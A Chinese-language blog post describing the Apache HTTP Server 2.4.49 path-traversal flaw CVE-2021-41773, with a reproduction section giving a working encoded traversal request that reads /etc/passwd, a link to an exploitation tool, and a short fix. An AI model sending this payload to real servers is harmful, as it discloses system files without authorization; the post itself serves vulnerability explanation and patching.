前言:

Apache Software 已迅速发布了针对 Apache HTTP Server 中的零日安全漏洞的修复程序,该漏洞于上周首次报告给该项目。该漏洞正在野外被积极利用,它表示,并可能允许攻击者访问敏感信息。

CVE-2021-41773 可能允许路径遍历和随后的文件泄露。路径遍历问题允许未经授权的人访问 Web 服务器上的文件,方法是欺骗 Web 服务器或在其上运行的 Web 应用程序返回存在于 Web 根文件夹之外的文件。

该问题仅影响 Apache 开源 Web 服务器的 2.4.49 版,在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷,攻击者可以利用以进行进一步攻击的敏感信息。

漏洞复现:

直接访问地址,插入poc  /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

漏洞POC:

127.0.0.1/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

利用工具:
https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013

修复方式:

升级到高版本

“要求所有拒绝”(拒绝访问所有请求)是保护 Web 根目录之外的文档的默认设置

Apache——CVE-2021-41773相关推荐

  1. 2021 Apache Pulsar 中文社区先锋奖与年度优秀案例奖出炉!

    Apache Pulsar 社区亚洲峰会 Pulsar Summit Asia 2021 已在 2022 年 1 月 15-16 日于线上成功举办.此次峰会是第二届亚洲峰会,聚集 30+ 嘉宾分享 A ...

  2. 首届全球 Pulsar Hackathon 2021 结果宣布,全球 Top5 团队出炉!

    关于 Apache Pulsar Apache Pulsar 是 Apache 软件基金会顶级项目,是下一代云原生分布式消息流平台,集消息.存储.轻量化函数式计算为一体,采用计算与存储分离架构设计,支 ...

  3. 里程碑!Apache Pulsar 全球 GitHub 贡献者数量超越 520——点进来定位你的名字!...

    近期,Apache Pulsar 悄悄 "520"啦--Apache Pulsar GitHub 主代码仓库迎来第 520 位贡献者!此里程碑的实现,距离 Apache Pulsa ...

  4. NewStarCTF week5 web wp

    Give me your photo PLZ 进去后看内容 看这个文字意思应该是考的二次渲染 贴个利用代码 制作二次渲染后不会被修改的图片马 其实还可以自己比对哪块地方被修改了,然后插到没被修改的里面 ...

  5. 【安全漏洞】CVE-2021-42287CVE-2021-42278 域内提权

    前言 网络安全技术学习,承认⾃⼰的弱点不是丑事.只有对原理了然于⼼,才能突破更多的限制.拥有快速学习能力的白帽子,是不能有短板的,有的只能是大量的标准板和几块长板.知识⾯,决定看到的攻击⾯有多⼴:知识 ...

  6. 请查收,您有一份阿里先锋开源项目清单

    前段时间,开源社<2021中国开源年度报告>发布,阿里蝉联中国企业开源活跃度No.1:在中国活跃开源项目 Top 30 榜单中,阿里开源的 Ant Design.Nacos.element ...

  7. Committer 蔡正昕专访:勇敢迈出第一步,做开源没有那么难

    关于 Apache Pulsar Apache Pulsar 是 Apache 软件基金会顶级项目,是下一代云原生分布式消息流平台,集消息.存储.轻量化函数式计算为一体,采用计算与存储分离架构设计,支 ...

  8. Flink Sort-Shuffle 实现简介

    公众号更名公告 「Flink 中文社区」更名为「Apache Flink」 感谢你们的关注 摘要:本文介绍 Sort-Shuffle 如何帮助 Flink 在应对大规模批数据处理任务时更加游刃有余.主 ...

  9. WEEX框架(一)框架简介和快速上手体验

    框架简介 Weex,是能够完美兼顾性能与动态性,让移动开发者通过简捷的前端语法写出Native级别的性能体验的框架,并支持iOS.安卓.Web等多端部署,由阿里巴巴研发和维护. 对于移动开发者来说,W ...

  10. 拥抱开源 | Xiaomi Vela团队成果连连,喜讯不断

    Xiaomi Vela是基于开源实时操作系统NuttX打造的物联网操作系统,Vela可以在各种物联网硬件上提供统一的软件平台,通过丰富的组件和标准化的软件框架,打通碎片化的物联网应用场景. 今年Xia ...

最新文章

  1. 你花了多久弄明白架构设计?kafka日志清理
  2. aspose.words 操作word插入空白页_让 “空白页”无处可逃,消除你的烦恼
  3. 【SmartJob】配置说明
  4. liferay jsp如何得到某个文件如 ”language.properties
  5. step-by-step多文件WEB批量上传(swfupload)的完美解决方案
  6. VS 如何修改C++编译标准
  7. 计科14-1 140201125 王振禹 作业三
  8. elasticsearch aggregations_Elasticsearch聚合的嵌套桶如何排序
  9. soultion of mySQL disk exceeded problem
  10. 阶段1 语言基础+高级_1-3-Java语言高级_06-File类与IO流_06 Properties集合_1_使用Properties集合存储数据,遍历取出集合中的数据...
  11. 情景规划(Scenario planning) (转载)
  12. 打印机外接无线服务器,打印机配置外接网卡实现网络打印,请问怎样设置,越祥细越好,很急希望多帮忙...
  13. java碰碰球历险记下载_幼儿园玩球教案碰碰球.doc
  14. Ehcache开源解读
  15. 自然辩证法2018版_自然辩证法-2018版课后思考题答案
  16. 【C语言】指针进阶第五站,函数指针
  17. format的几种用法
  18. Python3 利用阿里接口,根据银行卡号获取银行名称和logo
  19. 买了新手机却不适应?教你一步克隆旧手机信息
  20. Spring框架-AOP

热门文章

  1. 微型计算机最早应用于,计算机文化基础题库(含答案)
  2. kartoslam找bug之行
  3. 由魅族16到Reno5新机的转变!绿厂凭这几点吸引了我
  4. SpringCloud(3)--服务熔断降级
  5. PT_基本概率公式(减法/加法/乘法/除法(条件概率)/全概率/贝叶斯)@条件概率链式法则@乘法法则
  6. 【hadoop权威指南第四版】第五章MR应用【笔记+代码】
  7. 临床数据共享能带来什么好处?
  8. 《算法分析与设计》练习14
  9. 【Java基础】· Java基本语法:程序流程控制习题总结
  10. 涅槃?高效报表开发人员的五件武器